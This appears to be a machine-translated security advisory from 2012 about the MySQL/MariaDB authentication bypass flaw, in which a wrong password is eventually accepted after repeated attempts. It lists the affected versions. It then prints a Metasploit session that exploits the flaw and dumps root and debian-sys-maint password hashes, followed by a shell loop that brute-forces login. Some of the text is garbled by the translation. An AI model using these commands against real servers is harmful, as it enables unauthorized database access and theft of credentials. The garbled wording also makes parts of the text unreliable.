mysql any user password the probability of landing vulnerability-vulnerability warning-the black bar safety net

2012-12-20T00:00:00
ID MYHACK58:62201236272
Type myhack58
Reporter 佚名
Modified 2012-12-20T00:00:00

Description

When connected to MariaDB/MySQL, enter the password with the desired correct password comparison, due to incorrect handling, cause even if the memcmp()returned a non-zero value, it will make MySQL think that the two passwords are the same.

That is as long as you know the user name, continually try to will be able to log in directly to the SQL Database. According to the Bulletin saying about 2 5 to 6 times just to be able to Simon for once. And exploit tool has emerged.

Affected products: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

Authentication method:

$ msfconsole msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1 msf auxiliary(mysql_authbypass_hashdump) > run [+] 127.0.0.1:3 3 0 6 The server allows logins, proceeding with bypass test [] 127.0.0.1:3 3 0 6 Authentication bypass is 1 0% complete [] 127.0.0.1:3 3 0 6 Authentication bypass is 2 0% complete [] 127.0.0.1:3 3 0 6 Successfully bypassed authentication after 2 0 5 attempts [+] 127.0.0.1:3 3 0 6 Successful exploited the authentication bypass flaw, dumping hashes... [+] 127.0.0.1: 3 3 0 6 Saving HashString as Loot: root:C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3 3 0 6 Saving HashString as Loot: root:C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3 3 0 6 Saving HashString as Loot: root:C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3 3 0 6 Saving HashString as Loot: root:C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3 3 0 6 Saving HashString as Loot: debian-sys-maint:C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89 [] 127.0.0.1:3 3 0 6 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt [] Scanned 1 of 1 hosts (1 0 0% complete) [*] Auxiliary module execution completed

$ for i in seq 1 1 0 0 0; do mysql-u root –password=bad-h 127.0.0.1 2>/dev/null; done mysql>